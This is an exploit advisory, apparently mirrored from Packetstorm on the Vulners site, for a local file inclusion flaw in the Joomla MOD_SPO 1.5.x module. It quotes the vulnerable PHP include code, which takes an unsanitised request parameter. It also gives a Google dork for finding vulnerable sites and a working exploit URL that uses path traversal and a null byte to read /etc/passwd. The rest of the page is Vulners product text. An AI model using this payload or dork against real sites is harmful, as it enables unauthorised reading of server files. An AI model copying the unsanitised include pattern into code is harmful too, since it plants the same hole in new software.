Lucene search
K

Joomla Spo 1.5.x Local File Inclusion

🗓️ 22 Jul 2011 00:00:00Reported by JbyteType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Joomla MOD_SPO 1.5.x Local File Inclusion vulnerabilit

Code
`# Exploit Title: LFI Joomla Component MOD_SPO   
# Google Dork: inurl:MOD_SPO  
# Date: 15/07/2011  
# Author: Jbyte  
# Software Link: http://extensions.joomla.org/extensions/style-a-design/accessibility/5974  
# Version: 1.5.x   
# Tested on: Ubuntu 11.04, Windows xp  
  
  
This Component of joomla has LFI(Local File Inclusion) you may call files of the server.  
  
  
Vulnerable Code:  
  
$s_lang =& JRequest::getVar('spo_site_lang');  
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))  
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')  
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');  
  
  
Exploit  
  
http://www.example.com/home/modules/mod_spo/[email protected]&spo_f_email[0][email protected]&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se  
  
Visited: http://jbyte-security.blogspot.com/  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation